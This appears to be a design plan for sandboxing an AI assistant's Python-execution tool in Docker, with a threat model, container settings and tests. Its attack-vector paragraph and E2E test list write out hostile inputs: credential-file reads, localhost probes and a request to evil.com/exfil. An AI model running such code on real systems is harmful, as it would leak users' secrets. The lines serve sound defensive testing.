# Plan: Docker Sandbox for Annie's `execute_python`

## Context

Session 366 sandboxed Claude CLI via Telegram using Docker containers (NemoClaw-inspired 4-layer isolation). During verification, we discovered Annie's `execute_python` tool has **zero isolation** — `code_tools.py:_run_code_sync()` runs arbitrary Python as UID 1000 with `env=os.environ.copy()`, giving full filesystem, network, and credential access. The only protections are 4 string-matched blocked imports (trivially bypassable via `__import__()`) and process rlimits.

**Attack vector**: Any Telegram message or voice command can trigger `execute_python` with code like `open('/home/rajesh/.claude/.credentials.json').read()` or `requests.get("http://localhost:8100/v1/entities")`.

**Goal**: Run all `execute_python` code inside ephemeral Docker containers with no host credentials, read-only filesystem, sanitized environment, and **zero network access**. Preserve existing behavior (matplotlib images, voice/text timeouts, output format).

## Review History

- **Round 1**: 27 issues from architecture + code quality destruction reviews (19 implemented, 2 accepted, 2 rejected, 2 resolved, 2 deferred)
- **Round 2**: NemoClaw comparison + hostile security architect critique of our NemoClaw analysis. Key finding: **`--network=host` + iptables is fundamentally broken** (host rule pollution, NET_ADMIN contradiction, concurrent container races). Solution: `--network=none`.

### Critical changes from Round 2:
- **`--network=none`** replaces `--network=host` + iptables — eliminates ALL network attack surface (SSRF, DNS rebinding, localhost service access, external exfiltration)
- **No iptables** — removed from Dockerfile, no `NET_ADMIN` needed
- **Landlock LSM**: zero-cost defense-in-depth in `sandbox_runner.py` (writable paths limited to `/tmp` + `/output`; `/usr` + `/lib` stay readable, per Step 0c)
- **Pinned pip packages** — exact versions + `--require-hashes` in requirements file
- **No `shell=True`** — explicit guard comment in `build_docker_cmd`

## Design Decisions

| # | Decision | Rationale |
|---|----------|-----------|
| D1 | Module at `services/annie-voice/python_sandbox.py` | Both callers (voice + text chat) live in annie-voice |
| D2 | Keep API synchronous | `_run_code_sync` is sync, called via `run_in_executor` by both paths — no caller changes |
| D3 | tmpfs `/output` for matplotlib | Docker-managed tmpfs, no host dir. Base64 extracted via stdout sentinel in `sandbox_runner.py` |
| D4 | Bake all deps into pinned image | `python:3.12.8-slim-bookworm` + pinned numpy/matplotlib/pandas/scipy/sklearn with hashes |
| D5 | Pass code via stdin | List-form `subprocess.run` (NEVER `shell=True`). Avoids bind-mounting host temp files |
| D6 | Sanitize ALL env vars | Pass only `MPLBACKEND`, `OPENBLAS_NUM_THREADS`, `OMP_NUM_THREADS`, `MKL_NUM_THREADS`, `HOME` |
| D7 | RLIMIT_CPU inside container | Timeout passed as CLI arg (not hardcoded). Outer timeout = inner + 10s grace |
| D8 | **No fallback** — tool disabled when sandbox unavailable | Silent fallback = silent security regression. Tool returns error message instead |
| D9 | **`--network=none`**: total network isolation | Code execution does not need network. yt-dlp stays in image (for parsing) but downloads will fail with a network error. Eliminates: SSRF, DNS rebinding, localhost access, exfiltration, iptables complexity, NET_ADMIN |
| D10 | **Landlock LSM** in sandbox_runner.py | Zero-cost on Linux 6.17 (Titan). Restricts writes to `/tmp` + `/output` and reads to `/usr` + `/lib` (see Step 0c). Prevents symlink traversal in writable tmpfs |

### NemoClaw Comparison (what we adopted vs. skipped)

| NemoClaw Feature | Our Status | Rationale |
|------------------|-----------|-----------|
| Filesystem: Landlock LSM | **ADOPTED** | Zero-cost, prevents tmpfs symlink traversal |
| Network: deny-by-default whitelist | **ADOPTED** (as `--network=none`) | Stronger: no network at all, vs NemoClaw's per-endpoint whitelist |
| Network: SSRF validation (ssrf.ts) | **Not needed** | `--network=none` eliminates the entire attack class |
| Network: binary-level ACLs | **Not needed** | No network = no exfiltration regardless of binary |
| Process: non-root + cap-drop ALL | **ADOPTED** | Same pattern |
| Process: two-user privilege separation | **Skipped** | No gateway/enforcer process to protect. Single ephemeral runner |
| Tools: operator approval TUI | **Skipped** | Headless ephemeral sandbox, no operator present |
| Config: immutable/mutable split | **Skipped** | No persistent config — everything is tmpfs |
| Supply chain: SHA256 verification | **ADOPTED** | `--require-hashes` in pip requirements |
| C-2: no shell interpolation | **ADOPTED** | Explicit guard comment + list-form subprocess |
| C-4: path traversal protection | **Covered by Landlock** | Landlock restricts accessible paths kernel-side |

---

## Phase 0: Dockerfile + Container Entrypoint

### Step 0a: Benchmark Docker startup on Titan

Before committing to this architecture, measure container startup latency:
```bash
# On Titan — run 10 times, measure p50/p99
for i in $(seq 10); do
  time echo 'print("ok")' | docker run --rm -i --network=none python-sandbox:latest --timeout 10
done
```

**Gate**: If p99 > 1.5s, implement a pre-warmed container pool. If p99 < 1s, proceed with ephemeral containers. A p99 between 1s and 1.5s falls outside both rules and needs an explicit call before Phase 1.
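The bash loop above only prints raw timings, so the percentiles still have to be computed. A minimal sketch of that step, assuming the wall-clock seconds have been collected by hand into a list (the sample values below are hypothetical, and `percentile` and `gate` are illustrative names, not part of the plan):

```python
import math


def percentile(samples: list[float], pct: float) -> float:
    """Nearest-rank percentile: the smallest sample with pct% of the data at or below it."""
    if not samples:
        raise ValueError("need at least one sample")
    ordered = sorted(samples)
    rank = max(1, math.ceil(pct / 100 * len(ordered)))
    return ordered[rank - 1]


def gate(samples: list[float], pool_above_s: float = 1.5, proceed_below_s: float = 1.0) -> str:
    """Apply the Step 0a gate to the measured p99."""
    p99 = percentile(samples, 99)
    if p99 > pool_above_s:
        return "pool"
    if p99 < proceed_below_s:
        return "ephemeral"
    return "undecided"  # between the two thresholds: the gate does not say


# Hypothetical wall-clock timings (seconds) from ten runs
timings = [0.41, 0.38, 0.45, 0.40, 0.39, 0.52, 0.43, 0.37, 0.44, 0.95]
print(percentile(timings, 50), percentile(timings, 99), gate(timings))
```

With only ten samples the nearest-rank p99 is simply the slowest run, so a larger sample may be worth collecting if the result lands near a threshold.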

### Step 0b: New `services/annie-voice/Dockerfile.python-sandbox`

```dockerfile
FROM python:3.12.8-slim-bookworm

ENV DEBIAN_FRONTEND=noninteractive

# System deps for matplotlib (freetype, png) and scipy (OpenBLAS)
# No iptables needed — using --network=none (total isolation)
RUN apt-get update && apt-get install -y --no-install-recommends \
    libfreetype6 libpng16-16 libopenblas0 \
    && rm -rf /var/lib/apt/lists/*

# Data science libraries — pinned versions with hash verification
COPY requirements-sandbox.txt /tmp/requirements-sandbox.txt
RUN pip install --no-cache-dir --require-hashes -r /tmp/requirements-sandbox.txt \
    && rm /tmp/requirements-sandbox.txt

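# Pre-warm matplotlib font cache (saves ~300ms on first import).
# NOTE: this RUN executes as root, so the cache lands under /root/.cache, and the
# runtime tmpfs on /home/sandbox hides any cache under the sandbox user's home.
# Confirm in the Step 0a benchmark that the pre-warm actually helps at runtime.
RUN python3 -c "import matplotlib.pyplot"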

# Non-root sandbox user
RUN groupadd -r sandbox \
    && useradd -r -g sandbox -d /home/sandbox -m -s /bin/bash sandbox

# Container entrypoint
COPY sandbox_runner.py /usr/local/bin/sandbox_runner.py

WORKDIR /home/sandbox
USER sandbox
ENTRYPOINT ["python3", "/usr/local/bin/sandbox_runner.py"]
```

### Step 0b-ii: New `services/annie-voice/requirements-sandbox.txt`

Pinned versions with hashes (generated via `pip-compile --generate-hashes`):

```
numpy==1.26.4 --hash=sha256:...
matplotlib==3.9.2 --hash=sha256:...
pandas==2.2.3 --hash=sha256:...
seaborn==0.13.2 --hash=sha256:...
scikit-learn==1.5.2 --hash=sha256:...
scipy==1.14.1 --hash=sha256:...
sympy==1.13.3 --hash=sha256:...
Pillow==10.4.0 --hash=sha256:...
yt-dlp==2024.12.23 --hash=sha256:...
```

Exact hashes to be generated on Titan (aarch64) via:
```bash
pip install pip-tools && pip-compile --generate-hashes requirements-sandbox.in
```

### Step 0c: New `services/annie-voice/sandbox_runner.py` (~100 lines)

Container entrypoint that:
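1. **Apply Landlock** (Linux 6.17): restrict filesystem access to `/tmp` (rw), `/output` (rw), `/usr` (read + execute, so the interpreter can still be spawned), `/lib` (read + execute) only. Uses a `landlock` Python binding if one is added to the image (none is listed in `requirements-sandbox.txt`), otherwise the raw `landlock_create_ruleset` / `landlock_add_rule` / `landlock_restrict_self` syscalls via `ctypes`. Best-effort: skip with a warning if the kernel doesn't support it.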
2. Read Python code from stdin
3. Set `RLIMIT_CPU` to `--timeout` value (CLI arg, not hardcoded)
4. Write code to `/tmp/script.py`
5. Run via `subprocess.run([sys.executable, "/tmp/script.py"], cwd="/tmp", timeout=timeout)`
   - **CRITICAL: NEVER use `shell=True`** — prevents command injection
6. **Structured error output**: Print a JSON status object as the first line of stderr: `{"runner_status": "ok"}` or `{"runner_status": "error", "msg": "..."}`. The host parses this line to distinguish runner failures from user-code failures.
7. **Matplotlib extraction**: After code finishes, check if `/output/plot.png` exists. If yes, print `\n__MATPLOTLIB_BASE64__\n{base64_data}` to stdout. Host splits on sentinel.
8. Exit with subprocess exit code
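Steps 6 and 7 define the small output protocol between the runner and the host. The following is a rough sketch of just those two steps, not the full entrypoint; the helper names `emit_status` and `emit_plot` are hypothetical, and the streams are passed in so the logic can be exercised without a container:

```python
import base64
import io
import json
import os
import tempfile

SENTINEL = "\n__MATPLOTLIB_BASE64__\n"


def emit_status(stream, ok: bool, msg: str = "") -> None:
    """Write the one-line JSON runner status (step 6)."""
    payload = {"runner_status": "ok"} if ok else {"runner_status": "error", "msg": msg}
    stream.write(json.dumps(payload) + "\n")


def emit_plot(stream, plot_path: str) -> bool:
    """Append sentinel + base64 image if the plot file exists (step 7)."""
    if not os.path.isfile(plot_path):
        return False
    with open(plot_path, "rb") as fh:
        encoded = base64.b64encode(fh.read()).decode("ascii")
    stream.write(SENTINEL + encoded)
    return True


# Demo with in-memory streams and a fake plot file (stand-ins for stderr/stdout and /output/plot.png)
err, out = io.StringIO(), io.StringIO()
emit_status(err, ok=True)
with tempfile.TemporaryDirectory() as tmp:
    fake_plot = os.path.join(tmp, "plot.png")
    with open(fake_plot, "wb") as fh:
        fh.write(b"\x89PNG fake bytes")
    wrote = emit_plot(out, fake_plot)
    missing = emit_plot(io.StringIO(), os.path.join(tmp, "absent.png"))
```

In the real runner the two streams would be `sys.stderr` and `sys.stdout`, and the status line would need to be written before the user code produces any stderr of its own.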

### Verify
- `docker build -t python-sandbox:latest -f Dockerfile.python-sandbox .`
- `echo 'print("hello")' | docker run --rm -i --network=none python-sandbox:latest --timeout 10`
- `echo 'import numpy; print(numpy.__version__)' | docker run --rm -i --network=none python-sandbox:latest --timeout 10`
- `echo 'import socket; socket.create_connection(("1.1.1.1", 80))' | docker run --rm -i --network=none python-sandbox:latest --timeout 10` → should fail with network error
- Benchmark 10 runs, record p50/p99

---

## Phase 1: Core Sandbox Module

### New: `services/annie-voice/python_sandbox.py` (~280 lines)

Pattern: `services/telegram-bot/docker_sandbox.py` with all review fixes applied.

**Constants**:
```python
PYTHON_SANDBOX_IMAGE = os.getenv("PYTHON_SANDBOX_IMAGE", "python-sandbox:latest")
PYTHON_SANDBOX_CPUS = os.getenv("PYTHON_SANDBOX_CPUS", "1.0")
CONTAINER_PREFIX = "python-sandbox"
MAX_CONCURRENT = 3  # Semaphore cap — prevents Docker daemon OOM
_DOCKER_HEALTH_TTL = 60  # Re-check Docker health every 60s
_MATPLOTLIB_SENTINEL = "\n__MATPLOTLIB_BASE64__\n"
```

**Module state**:
```python
_sandbox_available: bool = False
_last_health_check: float = 0.0           # monotonic timestamp
_active_containers: dict[str, str] = {}   # execution_id -> container_name
_semaphore = threading.Semaphore(MAX_CONCURRENT)
```

**Functions**:

| Function | Sync/Async | Purpose |
|----------|-----------|---------|
| `check_sandbox_requirements() -> (bool, str)` | Sync | Startup: Docker binary, daemon, image, orphan sweep. Sets `_sandbox_available` |
| `is_available() -> bool` | Sync | Cached health check — re-runs `docker info` if stale (>60s). Returns False if Docker died at runtime |
| `build_docker_cmd(execution_id, *, memory, timeout) -> (list, str)` | Sync | Constructs `docker run` command. **NEVER shell=True.** |
| `run_code_sandboxed(code, uses_matplotlib, *, timeout, memory) -> dict` | Sync | Main entry: acquires semaphore, runs Docker, parses output, returns result dict |
| `_cleanup_orphaned_containers()` | Sync | `docker ps -aq --filter name=python-sandbox` + `docker rm -f` |
| `cleanup_all_containers()` | Sync | Kills all in `list(_active_containers.items())` — snapshot before iteration |

**Docker command** (from `build_docker_cmd`):
```
docker run --rm -i
  --name python-sandbox-{uuid4().hex[:12]}
  --user {uid}:{gid}
  --read-only
  --tmpfs /tmp:rw,noexec,size=50m,uid={uid},gid={gid}
  --tmpfs /home/sandbox:rw,noexec,size=50m,uid={uid},gid={gid}
  --tmpfs /output:rw,noexec,size=20m,uid={uid},gid={gid}
  --network none
  --memory {512m|1g} --memory-swap {same}
  --cpus 1.0
  --pids-limit 128
  --security-opt no-new-privileges
  --cap-drop ALL
  -e HOME=/home/sandbox
  -e MPLBACKEND=Agg
  -e OPENBLAS_NUM_THREADS=1
  -e OMP_NUM_THREADS=1
  -e MKL_NUM_THREADS=1
  python-sandbox:latest
  --timeout {10|30}
```

**Key security properties**:
- **`--network none`**: no network access beyond the container's own private loopback interface. No SSRF, no DNS rebinding, no reach into Titan's localhost services, no exfiltration. No iptables needed. No NET_ADMIN needed.
- **No host bind-mounts** — fully isolated filesystem
- **`noexec` on tmpfs** — prevents executing binaries from writable dirs (defense-in-depth with Landlock)
- **`uuid4().hex[:12]`** — 48-bit container names
- **Env whitelist** — only 5 safe vars passed. No secrets leak.
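As a sketch of how the command above might be assembled in list form, the function below mirrors the flags shown. It simplifies the planned signature (no `execution_id`), and the `uid`/`gid` parameters and the `999` values in the demo are assumptions, since the plan does not say where they come from:

```python
import uuid

CONTAINER_PREFIX = "python-sandbox"


def build_docker_cmd(*, memory: str, timeout: int, uid: int, gid: int,
                     image: str = "python-sandbox:latest",
                     cpus: str = "1.0") -> tuple[list[str], str]:
    """Return (argv list, container name). List form only: never a shell string."""
    name = f"{CONTAINER_PREFIX}-{uuid.uuid4().hex[:12]}"
    owner = f"uid={uid},gid={gid}"
    cmd = [
        "docker", "run", "--rm", "-i",
        "--name", name,
        "--user", f"{uid}:{gid}",
        "--read-only",
        "--tmpfs", f"/tmp:rw,noexec,size=50m,{owner}",
        "--tmpfs", f"/home/sandbox:rw,noexec,size=50m,{owner}",
        "--tmpfs", f"/output:rw,noexec,size=20m,{owner}",
        "--network", "none",
        "--memory", memory, "--memory-swap", memory,
        "--cpus", cpus,
        "--pids-limit", "128",
        "--security-opt", "no-new-privileges",
        "--cap-drop", "ALL",
    ]
    # Explicit whitelist: nothing from the host environment is forwarded
    env = {
        "HOME": "/home/sandbox",
        "MPLBACKEND": "Agg",
        "OPENBLAS_NUM_THREADS": "1",
        "OMP_NUM_THREADS": "1",
        "MKL_NUM_THREADS": "1",
    }
    for key, value in env.items():
        cmd += ["-e", f"{key}={value}"]
    cmd += [image, "--timeout", str(timeout)]
    return cmd, name


cmd, name = build_docker_cmd(memory="512m", timeout=10, uid=999, gid=999)
```

Because every element is a separate string handed to `subprocess.run` as a list, no value is ever interpreted by a shell.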

**Matplotlib output flow** (stdout sentinel):
1. User code runs, matplotlib auto-save writes to `/output/plot.png` (container tmpfs)
2. `sandbox_runner.py` checks `/output/plot.png` after code finishes
3. If exists: prints `\n__MATPLOTLIB_BASE64__\n{base64_data}` to stdout
4. Host-side `run_code_sandboxed` splits stdout on `_MATPLOTLIB_SENTINEL`
5. Text before sentinel = real stdout. Text after = base64 image data.

**`run_code_sandboxed` flow**:
1. Acquire `_semaphore` (max 3 concurrent). If blocked >5s, return error "Code execution busy"
2. Check `is_available()` (cached Docker health). If False, return error
3. If `uses_matplotlib`: inject auto-save snippet (`plt.savefig("/output/plot.png", dpi=150, bbox_inches='tight')`)
4. Build Docker command via `build_docker_cmd` — **list-form only, NEVER shell=True**
5. Track: `_active_containers[exec_id] = container_name`
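6. Run `subprocess.run(cmd, input=code.encode(), timeout=timeout+10, capture_output=True)`
   - Extra 10s grace for Docker startup + teardown beyond inner timeout
   - On `subprocess.TimeoutExpired`, run `docker rm -f {container_name}`: killing the `docker run` client does not by itself stop the container
7. **Check returncode**: 137 (128 + SIGKILL, typically the cgroup OOM killer) → "Out of memory", 139 (128 + SIGSEGV) → "Killed by signal"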
8. **Parse stderr first line**: JSON `runner_status`. If `"error"`, return runner error (not user code error)
9. **Parse stdout**: split on `_MATPLOTLIB_SENTINEL`. Before = stdout, after = image base64
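10. Truncate stdout/stderr (reuse `_truncate()` from code_tools; import it lazily or move it to a shared module, since `code_tools` itself imports `python_sandbox` and a top-level import would be circular)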
11. Cleanup: pop from `_active_containers`, release `_semaphore` (in `finally` block)
12. Return `{"stdout", "stderr", "returncode", "image_base64"}`

### Verify
- Unit tests (Phase 4)

---

## Phase 2: Wire Into `code_tools.py`

### Modify: `services/annie-voice/code_tools.py` (~25 lines changed)

1. **Import** `python_sandbox` at top
2. **Replace** `_run_code_sync` body — no fallback, no rename:

```python
def _run_code_sync(code, uses_matplotlib, timeout=None, memory_limit=None):
    """Run Python code in Docker sandbox (mandatory — no unsandboxed fallback)."""
    if not python_sandbox.is_available():
        return {
            "stdout": "",
            "stderr": "Code execution is temporarily unavailable (sandbox offline).",
            "returncode": 1,
            "image_base64": None,
        }
    _timeout = timeout or TIMEOUT_SECONDS
    _mem = _format_docker_memory(memory_limit or MEMORY_LIMIT_BYTES)
    return python_sandbox.run_code_sandboxed(
        code, uses_matplotlib, timeout=_timeout, memory=_mem,
    )
```

3. **Add** `_format_docker_memory(bytes_limit: int) -> str` helper (512MB → "512m", 1GB → "1g")
4. **Remove** `_BLOCKED_IMPORTS` check entirely — `--network=none` + Docker isolation replaces it
5. **Remove** old `_run_code_sync` implementation (subprocess with `preexec_fn`), the `_set_resource_limits()` function, and the `resource` import
6. **Keep** `_truncate()`, constants, `register_code_tools`, `handle_execute_python` unchanged

**No changes needed** in `handle_execute_python`, `register_code_tools`, or `text_llm.py:685-706` — they call `_run_code_sync` which transparently delegates.

### Modify: `services/annie-voice/text_llm.py` (minimal)

- `_scrub_secrets()` call at lines 701-706 stays as defense-in-depth
- Add comment: `# _scrub_secrets is redundant with Docker sandbox env isolation but kept for defense-in-depth`
- Bump `_code_executor = ThreadPoolExecutor(max_workers=3)` (was 2, match semaphore cap)

### Verify
- Existing `test_code_tools.py` tests pass (with `python_sandbox.is_available` mocked)
- New sandbox-mode tests (Phase 4)

---

## Phase 3: Server Lifecycle + Deployment Integration

### Modify: `services/annie-voice/server.py` (~10 lines)

**Startup** — add after step 8 (checkpoint scan), before "All background services started":
```python
# 9. Python code execution sandbox
import python_sandbox
ok, reason = python_sandbox.check_sandbox_requirements()
if ok:
    logger.info("Python sandbox: ready")
else:
    logger.warning("Python sandbox: {} — execute_python tool DISABLED", reason)
```

**Shutdown** — add before "All background services stopped":
```python
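try:
    import python_sandbox
    python_sandbox.cleanup_all_containers()
except Exception as exc:
    # Best-effort cleanup: never block shutdown, but leave a trace in the log
    logger.warning("Python sandbox cleanup failed: " + repr(exc))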
```

### Modify: `start.sh` — `start_annie()` function (~8 lines)

Add after line 520 (mkdir for kernel dirs), before the `ssh -f` that starts the server:
```bash
# Python code execution sandbox image (REQUIRED — service won't execute code without it)
if ! ssh "$TITAN_HOST" "docker image inspect python-sandbox:latest" >/dev/null 2>&1; then
    echo -e "  ${YELLOW}Building Python sandbox image...${NC}"
    ssh "$TITAN_HOST" "cd $TITAN_PROJECT/services/annie-voice && \
        docker build -t python-sandbox:latest -f Dockerfile.python-sandbox ." 2>&1 | tail -1
    if ! ssh "$TITAN_HOST" "docker image inspect python-sandbox:latest" >/dev/null 2>&1; then
        echo -e "  ${RED}Python sandbox image build FAILED — execute_python will be disabled${NC}"
    fi
fi
```

### New: `services/annie-voice/setup-python-sandbox.sh` (~50 lines)

Idempotent setup (pattern: `services/telegram-bot/setup-claude-sandbox.sh`):
1. Build Docker image (skip if exists, `--rebuild` flag to force)
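2. Verify libraries: `docker run --rm --network=none --entrypoint python3 python-sandbox:latest -c "import numpy, matplotlib, pandas, scipy, sklearn; print('OK')"` (`--entrypoint` is required because the image's `ENTRYPOINT` is `sandbox_runner.py`, which would otherwise receive `python3 -c ...` as its own arguments)
3. Verify network isolation: `docker run --rm --network=none --entrypoint python3 python-sandbox:latest -c "import socket; socket.create_connection(('1.1.1.1', 80))"` → must fail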
4. Report image size

### New: `services/annie-voice/verify-python-sandbox.sh` (~100 lines)

Run inside container to verify isolation:
1. **Filesystem**: Cannot read `/home/rajesh`, `/etc/shadow`. CAN write to `/tmp`, `/output`
2. **Environment**: No `ANTHROPIC_API_KEY`, `CONTEXT_ENGINE_TOKEN`, `TELEGRAM_BOT_TOKEN` in env
3. **Network**: ALL network connections fail (`--network=none`). Test: `python3 -c "import socket; socket.create_connection(('1.1.1.1', 80))"` → must fail
4. **Process**: Running as non-root, UID != 0, CapEff = 0
5. **Read-only**: Cannot `pip install`, cannot write to `/usr`
6. **Libraries**: numpy, matplotlib, pandas, scipy, sklearn all importable
7. **Config**: `MPLBACKEND=Agg`, `OPENBLAS_NUM_THREADS=1`

### Verify
- `bash setup-python-sandbox.sh` on Titan — image builds
- `verify-python-sandbox.sh` inside container — all PASS
- `start.sh` builds image on first deploy, warns on failure

---

## Phase 4: Tests

### New: `services/annie-voice/tests/test_python_sandbox.py` (~450 lines, ~45 tests)

Pattern: `services/telegram-bot/tests/test_docker_sandbox.py`

| Test Class | Tests | What |
|-----------|-------|------|
| `TestBuildDockerCmd` | ~14 | Command structure, `--read-only`, `--network none`, tmpfs mounts (3: /tmp, /home/sandbox, /output) with `noexec`, no host bind-mounts, `--cap-drop ALL`, `no-new-privileges`, env whitelist (no secrets), `uuid[:12]` names, resource limits, no `shell=True` anywhere |
| `TestRunCodeSandboxed` | ~12 | Print, syntax error, matplotlib (sentinel parsing), empty code, timeout, Docker not found, OOM (rc=137), truncation, semaphore blocking, runner JSON error parsing |
| `TestIsAvailable` | ~5 | Cached health check, TTL expiry re-checks Docker, Docker death at runtime flips flag |
| `TestCheckSandboxRequirements` | ~5 | Docker binary, daemon, image, orphan cleanup, flag setting |
| `TestContainerLifecycle` | ~5 | Orphan cleanup, shutdown cleanup (`list()` snapshot), semaphore release on error/timeout |
| `TestConcurrency` | ~3 | Semaphore blocks 4th concurrent call, timeout on semaphore acquire returns error |
| `TestDisabledBehavior` | ~3 | When unavailable: returns error dict, no subprocess spawned |

### Modify: `services/annie-voice/tests/test_code_tools.py` (~40 lines)

- Add `@patch("code_tools.python_sandbox")` to existing `_run_code_sync` tests
- Mock `python_sandbox.is_available()` → True, `run_code_sandboxed()` → returns expected dict
- Add `TestSandboxDelegation` class (~5 tests):
  - `_run_code_sync` calls `run_code_sandboxed` when available
  - `_run_code_sync` returns error dict when unavailable (no fallback)
  - `_format_docker_memory` converts bytes correctly (512MB→"512m", 1GB→"1g")
  - Verify `_BLOCKED_IMPORTS` is removed (no string match check)

### Verify
- `cd services/annie-voice && python -m pytest tests/test_python_sandbox.py -v` — all pass
- `cd services/annie-voice && python -m pytest tests/test_code_tools.py -v` — all pass
- `cd services/annie-voice && python -m pytest tests/ -v` — full suite green

---

## Phase 5: Deploy & E2E Verify

1. `bash setup-python-sandbox.sh` on Titan
2. **Benchmark**: Run 10x startup latency test (Step 0a). Record p50/p99.
3. Restart annie-voice via `start.sh`
4. Check logs: `ssh titan "grep 'Python sandbox' /tmp/annie-voice.log"` — should say "ready"
5. **E2E tests** (manual via Telegram text chat):
   - `print("hello")` → returns "hello" (basic execution)
   - `import numpy; print(numpy.__version__)` → version string (library access)
   - `import matplotlib.pyplot as plt; plt.plot([1,2,3]); plt.show()` → image_base64 in result
   - `import os; print(dict(os.environ))` → NO secrets (only MPLBACKEND, OPENBLAS, etc.)
   - `print(open('/home/rajesh/.env').read())` → FileNotFoundError (no host mount)
   - `print(open('/home/rajesh/.claude/.credentials.json').read())` → FileNotFoundError
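   - `import subprocess; print(subprocess.run(['cat', '/etc/hostname'], capture_output=True, text=True).stdout)` → container hostname, not Titan (with Landlock active, `/etc` is outside the allowed paths, so expect empty output and a permission error from `cat` instead)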
   - `import socket; socket.create_connection(("1.1.1.1", 80))` → **OSError: network unreachable** (`--network=none`)
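   - `import socket; socket.create_connection(("localhost", 8100))` → **OSError** (typically `ConnectionRefusedError`: `--network=none` leaves the container its own loopback interface, but nothing listens there and Titan's port 8100 is not reachable)
   - `import requests; requests.get("http://evil.com/exfil")` → **ConnectionError** (no network; assumes `requests` is present in the image, which `requirements-sandbox.txt` does not list explicitly)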
6. `bash verify-python-sandbox.sh` inside container — all PASS

---

## File Inventory

| Action | File | Est. Lines |
|--------|------|-----------|
| NEW | `services/annie-voice/Dockerfile.python-sandbox` | ~25 |
| NEW | `services/annie-voice/requirements-sandbox.txt` | ~30 (pinned versions + hashes) |
| NEW | `services/annie-voice/sandbox_runner.py` | ~100 |
| NEW | `services/annie-voice/python_sandbox.py` | ~280 |
| NEW | `services/annie-voice/setup-python-sandbox.sh` | ~50 |
| NEW | `services/annie-voice/verify-python-sandbox.sh` | ~100 |
| NEW | `services/annie-voice/tests/test_python_sandbox.py` | ~450 |
| MODIFY | `services/annie-voice/code_tools.py` | ~25 lines changed |
| MODIFY | `services/annie-voice/text_llm.py` | ~5 lines changed |
| MODIFY | `services/annie-voice/server.py` | ~10 lines added |
| MODIFY | `services/annie-voice/tests/test_code_tools.py` | ~40 lines added |
| MODIFY | `start.sh` | ~8 lines added |

## Security Architecture (4 layers)

| Layer | Mechanism | What It Blocks |
|-------|-----------|---------------|
| **1. Filesystem** | `--read-only` root + tmpfs (`noexec`) for /tmp, /home/sandbox, /output. No host mounts. Landlock LSM restricts accessible paths. | Host credential reads, filesystem escape, exec from tmpfs |
| **2. Network** | **`--network=none`**: no interfaces except the container's private loopback | ALL network: SSRF, DNS rebinding, localhost services on Titan, external exfiltration, raw sockets |
| **3. Environment** | Explicit `-e` whitelist (5 vars). No `os.environ.copy()`. No secrets. | Env var credential leaks (ANTHROPIC_API_KEY, tokens, etc.) |
| **4. Process** | Non-root sandbox user, `--cap-drop ALL`, `no-new-privileges`, 128 PIDs, 512MB-1GB RAM, 1 CPU, RLIMIT_CPU inside container | Privilege escalation, resource exhaustion, fork bombs |

**vs. NemoClaw**: Our Layer 2 (`--network=none`) is STRONGER than NemoClaw's endpoint whitelist — we block everything, they allow specific endpoints. Our Layer 1 adds Landlock (same as NemoClaw). We skip NemoClaw's binary ACLs, operator TUI, and config split because our threat model is simpler (ephemeral code execution, not long-lived multi-tool agent).

## Pre-Mortem Failure Analysis

| # | Failure Scenario | Category | Likelihood | Impact | Mitigation |
|---|-----------------|----------|------------|--------|------------|
| 1 | Docker daemon OOM from concurrent containers | Resource | LOW | HIGH | Semaphore caps at 3 containers |
| 2 | Docker dies at runtime, flag stale | Temporal | MEDIUM | HIGH | Cached health check re-validates every 60s |
| 3 | Container OOM kill (exit 137) looks like code error | Silent | MEDIUM | LOW | Explicit OOM detection on rc=137 |
| 4 | Image build fails, `start.sh` continues | Cascade | MEDIUM | HIGH | Build failure logged; sandbox check at startup disables tool |
| 5 | Voice latency budget consumed by Docker startup | Performance | MEDIUM | MEDIUM | Benchmark gate (Step 0a). Pool if p99>1.5s |
| 6 | Supply chain attack on pip packages in image | Silent | LOW | CRITICAL | `--require-hashes` pins every package + hash |
| 7 | yt-dlp code fails due to `--network=none` | Functional | HIGH | LOW | Expected behavior. yt-dlp parsing works offline; downloads fail with clear error |

## Risks

| Risk | Impact | Mitigation |
|------|--------|------------|
| Docker startup latency (+200-500ms) | 2-5% of 10s voice timeout | Benchmark gate; pool fallback if needed |
| Image size ~800MB | Disk on 3.84TB SSD | Negligible |
| yt-dlp downloads fail (`--network=none`) | Users can't download videos in code | Separate `web_search`/`browse_webpage` tools handle fetching. Clear error message. |
| aarch64 image build | Package issues possible | Builds natively on Titan; pinned base image |
| Landlock not supported | Falls back gracefully | Best-effort: skip with warning if kernel rejects |